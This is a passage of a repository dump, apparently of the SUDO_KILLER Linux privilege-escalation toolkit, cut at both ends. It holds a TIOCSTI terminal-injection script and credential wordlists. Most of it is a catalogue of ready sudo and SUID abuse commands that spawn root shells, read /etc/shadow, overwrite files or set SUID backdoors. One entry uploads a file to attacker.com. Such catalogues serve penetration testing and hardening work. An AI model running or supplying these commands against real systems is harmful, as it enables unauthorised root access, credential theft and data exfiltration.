"Usage: $0 " 16 | 
exit 1 17 | fi 18 | 19 | # Get the username and command from command line arguments 20 | username="$1" 21 | shift 22 | command_to_run="$@" 23 | 24 | # Use 'su' to switch to the specified user and run the command via a pipe 25 | sudo su - "$username" </dev/null | sort -u | cut -d ":" -f 1 | grep -v "SK-search-sudoers.sh\|.sh\|.py\|.pl\|.c\|.perl\|.viminfo" | sort -u 20 | 21 | -------------------------------------------------------------------------------- /SK-Tools/ttyInject.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import fcntl 3 | import termios 4 | import os 5 | import sys 6 | import signal 7 | 8 | os.kill(os.getppid(), signal.SIGSTOP) 9 | 10 | for char in sys.argv[1] + '\n': 11 | fcntl.ioctl(0, termios.TIOCSTI, char) 12 | -------------------------------------------------------------------------------- /SK-Tools/userpwd.txt: -------------------------------------------------------------------------------- 1 | user:toor 2 | victim:victim 3 | john:nogood 4 | nathan:celib 5 | adriano:kajol 6 | -------------------------------------------------------------------------------- /SK-Tools/users.txt: -------------------------------------------------------------------------------- 1 | user1 2 | user2 3 | adriano 4 | john 5 | victim 6 | user 7 | tatiana 8 | nathan 9 | -------------------------------------------------------------------------------- /dbins/7z.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * LFILE=file_to_read 6 | sudo 7z a -ttar -an -so $LFILE | 7z e -ttar -si -so 7 | -------------------------------------------------------------------------------- /dbins/Dangerous_env_var.txt: -------------------------------------------------------------------------------- 1 | *=()* 2 | BASH_ENV 3 | __BASH_FUNC< 4 | BASH_FUNC_ 5 | BASHOPTS 6 | CDPATH 7 | ENV 8 | FPATH 9 | GLOBIGNORE 10 | HOSTALIASES 11 | IFS 12 | JAVA_TOOL_OPTIONS 13 | LD_* 14 | LOCALDOMAIN 15 | NLSPATH 16 | NULLCMD 17 | PATH_LOCALE 18 | PERL5DB 19 | PERL5LIB 20 | PERL5OPT 21 | PERLIO_DEBUG 22 | PERLLIB 23 | PS4 24 | PYTHONHOME 25 | PYTHONINSPECT 26 | PYTHONPATH 27 | PYTHONUSERBASE 28 | READNULLCMD 29 | RES_OPTIONS 30 | _RLD* 31 | RUBYLIB 32 | RUBYOPT 33 | SHELLOPTS 34 | TERMCAP 35 | TERMINFO 36 | TERMINFO_DIRS 37 | TERMPATH 38 | TMPPREFIX 39 | ZDOTDIR 40 | -------------------------------------------------------------------------------- /dbins/aa-exec.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo aa-exec /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/ab.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * Upload local file via HTTP POST request. 
6 | URL=http://attacker.com/ 7 | LFILE=file_to_send 8 | sudo ab -p $LFILE $URL 9 | -------------------------------------------------------------------------------- /dbins/agetty.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TH3xACE/SUDO_KILLER/e66cd6f397f13589d759f99cb67ab6bbb87cc1d4/dbins/agetty.txt -------------------------------------------------------------------------------- /dbins/alpine.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo alpine -F "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/anansi_util.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo /home/anansi/bin/anansi_util manual /bin/bash 6 | -------------------------------------------------------------------------------- /dbins/ansible-playbook.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * TF=$(mktemp) 6 | echo '[{hosts: localhost, tasks: [shell: /bin/sh /dev/tty 2>/ 7 | dev/tty]}]' >$TF 8 | sudo ansible-playbook $TF 9 | -------------------------------------------------------------------------------- /dbins/ansible-test.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo ansible-test shell 6 | -------------------------------------------------------------------------------- /dbins/aoss.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo aoss /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/apache2.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | It runs in privileged context and may be used to access the file system, 3 | escalate or maintain access with elevated privileges if enabled on sudo. 4 | * This will allow to read shadow file, retrieve root hash and perform a cracking 5 | sudo apache2 -f /etc/shadow 6 | -------------------------------------------------------------------------------- /dbins/apache2ctl.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * LFILE=file_to_read 6 | sudo apache2ctl -c "Include $LFILE" -k stop 7 | -------------------------------------------------------------------------------- /dbins/apt-get.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * This invokes the default pager, which is likely to be less, other 6 | functions may apply. 7 | sudo apt-get changelog apt 8 | !/bin/sh 9 | * For this to work the target package (e.g., sl) must not be installed. 10 | TF=$(mktemp) 11 | echo 'Dpkg::Pre-Invoke {"/bin/sh;false"}' > $TF 12 | sudo apt-get install -c $TF sl 13 | * When the shell exits the update command is actually executed. 14 | sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh 15 | -------------------------------------------------------------------------------- /dbins/apt.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * This invokes the default pager, which is likely to be less, other 6 | functions may apply. 7 | sudo apt changelog apt 8 | !/bin/sh 9 | * For this to work the target package (e.g., sl) must not be installed. 10 | TF=$(mktemp) 11 | echo 'Dpkg::Pre-Invoke {"/bin/sh;false"}' > $TF 12 | sudo apt install -c $TF sl 13 | * When the shell exits the update command is actually executed. 
14 | sudo apt update -o APT::Update::Pre-Invoke::=/bin/sh 15 | -------------------------------------------------------------------------------- /dbins/ar.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * TF=$(mktemp -u) 6 | LFILE=file_to_read 7 | sudo ar r "$TF" "$LFILE" 8 | cat "$TF" 9 | -------------------------------------------------------------------------------- /dbins/arj.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * The archive can also be prepared offline then uploaded. 6 | TF=$(mktemp -d) 7 | LFILE=file_to_write 8 | LDIR=where_to_write 9 | echo DATA >"$TF/$LFILE" 10 | arj a "$TF/a" "$TF/$LFILE" 11 | sudo arj e "$TF/a" $LDIR 12 | -------------------------------------------------------------------------------- /dbins/arp.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo arp -v -f "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/as.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * LFILE=file_to_read 6 | sudo as @$LFILE 7 | -------------------------------------------------------------------------------- /dbins/ascii-xfr.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo ascii-xfr -ns "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/ascii85.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo ascii85 "$LFILE" | ascii85 --decode 7 | -------------------------------------------------------------------------------- /dbins/ash.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo ash 6 | -------------------------------------------------------------------------------- /dbins/aspell.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * LFILE=file_to_read 6 | sudo aspell -c "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/at.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | sudo at now; tail -f /dev/null 6 | -------------------------------------------------------------------------------- /dbins/atobm.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo atobm $LFILE 2>&1 | awk -F "'" '{printf "%s", $2}' 7 | -------------------------------------------------------------------------------- /dbins/awk.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo awk 'BEGIN {system("/bin/sh")}' 6 | ***** Limited SUID ***** 7 | If the binary has the SUID bit set, it may be abused to access the file system, 8 | escalate or maintain access with elevated privileges working as a SUID 9 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 10 | it only works on systems like Debian (<= Stretch) that allow the default sh 11 | shell to run with SUID privileges. 12 | This example creates a local SUID copy of the binary and runs it to maintain 13 | elevated privileges. 
To interact with an existing SUID binary skip the first 14 | command and run the program using its original path. 15 | * sudo install -m =xs $(which awk) . 16 | 17 | ./awk 'BEGIN {system("/bin/sh")}' 18 | -------------------------------------------------------------------------------- /dbins/aws.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * This invokes the default pager, which is likely to be less, other 6 | functions may apply. 7 | sudo aws help 8 | !/bin/sh 9 | -------------------------------------------------------------------------------- /dbins/base32.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo base32 "$LFILE" | base32 --decode 7 | -------------------------------------------------------------------------------- /dbins/base58.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * LFILE=file_to_read 6 | sudo base58 "$LFILE" | base58 --decode 7 | -------------------------------------------------------------------------------- /dbins/base64.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo base64 "$LFILE" | base64 --decode 7 | -------------------------------------------------------------------------------- /dbins/basenc.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo basenc --base64 $LFILE | basenc -d --base64 7 | -------------------------------------------------------------------------------- /dbins/basez.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo basez "$LFILE" | basez --decode 7 | -------------------------------------------------------------------------------- /dbins/bash.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * sudo bash 6 | -------------------------------------------------------------------------------- /dbins/batcat.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo batcat --paging always /etc/profile 6 | !/bin/sh 7 | ***** Limited SUID ***** 8 | If the binary has the SUID bit set, it may be abused to access the file system, 9 | escalate or maintain access with elevated privileges working as a SUID 10 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 11 | it only works on systems like Debian (<= Stretch) that allow the default sh 12 | shell to run with SUID privileges. 13 | This example creates a local SUID copy of the binary and runs it to maintain 14 | elevated privileges. To interact with an existing SUID binary skip the first 15 | command and run the program using its original path. 16 | * sudo install -m =xs $(which batcat) . 17 | 18 | ./batcat --paging always /etc/profile 19 | !/bin/sh 20 | -------------------------------------------------------------------------------- /dbins/bc.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * LFILE=file_to_read 6 | sudo bc -s $LFILE 7 | quit 8 | -------------------------------------------------------------------------------- /dbins/bconsole.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo bconsole 6 | @exec /bin/sh 7 | -------------------------------------------------------------------------------- /dbins/bpftrace.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo bpftrace -e 'BEGIN {system("/bin/sh");exit()}' 6 | * TF=$(mktemp) 7 | echo 'BEGIN {system("/bin/sh");exit()}' >$TF 8 | sudo bpftrace $TF 9 | * sudo bpftrace -c /bin/sh -e 'END {exit()}' 10 | -------------------------------------------------------------------------------- /dbins/bridge.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo bridge -b "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/bundle.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * This invokes the default pager, which is likely to be less, other 6 | functions may apply. 7 | sudo bundle help 8 | !/bin/sh 9 | -------------------------------------------------------------------------------- /dbins/bundler.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * This invokes the default pager, which is likely to be less, other 6 | functions may apply. 7 | sudo bundler help 8 | !/bin/sh 9 | -------------------------------------------------------------------------------- /dbins/busctl.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo busctl --show-machine 6 | !/bin/sh 7 | -------------------------------------------------------------------------------- /dbins/busybox.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo busybox sh 6 | -------------------------------------------------------------------------------- /dbins/byebug.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * TF=$(mktemp) 6 | echo 'system("/bin/sh")' > $TF 7 | sudo byebug $TF 8 | continue 9 | ***** Limited SUID ***** 10 | If the binary has the SUID bit set, it may be abused to access the file system, 11 | escalate or maintain access with elevated privileges working as a SUID 12 | backdoor. If it is used to run commands (e.g., via system()-like invocations) 13 | it only works on systems like Debian (<= Stretch) that allow the default sh 14 | shell to run with SUID privileges. 15 | This example creates a local SUID copy of the binary and runs it to maintain 16 | elevated privileges. To interact with an existing SUID binary skip the first 17 | command and run the program using its original path. 18 | * sudo install -m =xs $(which byebug) . 19 | 20 | TF=$(mktemp) 21 | echo 'system("/bin/sh")' > $TF 22 | ./byebug $TF 23 | continue 24 | -------------------------------------------------------------------------------- /dbins/bzip2.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo bzip2 -c $LFILE | bzip2 -d 7 | -------------------------------------------------------------------------------- /dbins/c89.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo c89 -wrapper /bin/sh,-s . 
6 | -------------------------------------------------------------------------------- /dbins/c99.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo c99 -wrapper /bin/sh,-s . 6 | -------------------------------------------------------------------------------- /dbins/cabal.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo cabal exec -- /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/cancel.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TH3xACE/SUDO_KILLER/e66cd6f397f13589d759f99cb67ab6bbb87cc1d4/dbins/cancel.txt -------------------------------------------------------------------------------- /dbins/capsh.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo capsh -- 6 | -------------------------------------------------------------------------------- /dbins/cat.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * LFILE=file_to_read 6 | sudo cat "$LFILE" 7 | -------------------------------------------------------------------------------- /dbins/cdist.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo cdist shell -s /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/certbot.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * TF=$(mktemp -d) 6 | sudo certbot certonly -n -d x --standalone --dry-run --agree-tos --email 7 | x --logs-dir $TF --work-dir $TF --config-dir $TF --pre-hook '/bin/sh 1>&0 8 | 2>&0' 9 | -------------------------------------------------------------------------------- /dbins/check_by_ssh.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * The shell will only last 10 seconds. 
6 | sudo check_by_ssh -o "ProxyCommand /bin/sh -i <$(tty) |& tee $(tty)" - 7 | H localhost -C xx 8 | -------------------------------------------------------------------------------- /dbins/check_cups.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo check_cups --extra-opts=@$LFILE 7 | -------------------------------------------------------------------------------- /dbins/check_log.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_write 6 | INPUT=input_file 7 | sudo check_log -F $INPUT -O $LFILE 8 | -------------------------------------------------------------------------------- /dbins/check_memory.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo check_memory --extra-opts=@$LFILE 7 | -------------------------------------------------------------------------------- /dbins/check_raid.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * LFILE=file_to_read 6 | sudo check_raid --extra-opts=@$LFILE 7 | -------------------------------------------------------------------------------- /dbins/check_ssl_cert.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * The host example.net must return a certificate via TLS 6 | COMMAND=id 7 | OUTPUT=output_file 8 | TF=$(mktemp) 9 | echo "$COMMAND | tee $OUTPUT" > $TF 10 | chmod +x $TF 11 | umask 022 12 | check_ssl_cert --curl-bin $TF -H example.net 13 | cat $OUTPUT 14 | -------------------------------------------------------------------------------- /dbins/check_statusfile.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo check_statusfile $LFILE 7 | -------------------------------------------------------------------------------- /dbins/chmod.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * LFILE=file_to_change 6 | sudo chmod 6777 $LFILE 7 | -------------------------------------------------------------------------------- /dbins/choom.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo choom -n 0 /bin/sh 6 | -------------------------------------------------------------------------------- /dbins/chown.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_change 6 | sudo chown $(id -un):$(id -gn) $LFILE 7 | -------------------------------------------------------------------------------- /dbins/chroot.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo chroot / 6 | -------------------------------------------------------------------------------- /dbins/clamscan.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * LFILE=file_to_read 6 | TF=$(mktemp -d) 7 | touch $TF/empty.yara 8 | sudo clamscan --no-summary -d $TF -f $LFILE 2>&1 | sed -nE 's/^(.*): No 9 | such file or directory$/\1/p' 10 | -------------------------------------------------------------------------------- /dbins/cmp.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo cmp $LFILE /dev/zero -b -l 7 | -------------------------------------------------------------------------------- /dbins/cobc.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * TF=$(mktemp -d) 6 | echo 'CALL "SYSTEM" USING "/bin/sh".' > $TF/x 7 | sudo cobc -xFj --frelax-syntax-checks $TF/x 8 | -------------------------------------------------------------------------------- /dbins/column.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_read 6 | sudo column $LFILE 7 | -------------------------------------------------------------------------------- /dbins/comm.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
5 | * LFILE=file_to_read 6 | sudo comm $LFILE /dev/null 2>/dev/null 7 | -------------------------------------------------------------------------------- /dbins/cowsay.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * TF=$(mktemp) 6 | echo 'exec "/bin/sh";' >$TF 7 | sudo cowsay -f $TF x 8 | -------------------------------------------------------------------------------- /dbins/cowthink.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * TF=$(mktemp) 6 | echo 'exec "/bin/sh";' >$TF 7 | sudo cowthink -f $TF x 8 | -------------------------------------------------------------------------------- /dbins/cp.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * LFILE=file_to_write 6 | echo "DATA" | sudo cp /dev/stdin "$LFILE" 7 | * This can be used to copy and then read or write files from a restricted 8 | file systems or with elevated privileges. (The GNU version of cp has the 9 | --parents option that can be used to also create the directory hierarchy 10 | specified in the source path, to the destination folder.) 
11 | LFILE=file_to_write 12 | TF=$(mktemp) 13 | echo "DATA" > $TF 14 | sudo cp $TF $LFILE 15 | * This overrides cp itself with a shell (or any other executable) that is 16 | to be executed as root, useful in case a sudo rule allows to only run cp 17 | by path. Warning, this is a destructive action. 18 | sudo cp /bin/sh /bin/cp 19 | sudo cp 20 | -------------------------------------------------------------------------------- /dbins/cpan.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * sudo cpan 6 | ! exec '/bin/bash' 7 | -------------------------------------------------------------------------------- /dbins/cpio.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 5 | * echo '/bin/sh /dev/tty' >localhost 6 | sudo cpio -o --rsh-command /bin/sh -F localhost: 7 | * The whole directory structure is copied to $TF. 8 | LFILE=file_to_read 9 | TF=$(mktemp -d) 10 | echo "$LFILE" | sudo cpio -R $UID -dp $TF 11 | cat "$TF/$LFILE" 12 | * Copies $LFILE to the $LDIR directory. 13 | LFILE=file_to_write 14 | LDIR=where_to_write 15 | echo DATA >$LFILE 16 | echo $LFILE | sudo cpio -R 0:0 -p $LDIR 17 | -------------------------------------------------------------------------------- /dbins/cpulimit.txt: -------------------------------------------------------------------------------- 1 | ***** Sudo ***** 2 | If the binary is allowed to run as superuser by sudo, it does not drop the 3 | elevated privileges and may be used to access the file system, escalate or 4 | maintain privileged access. 
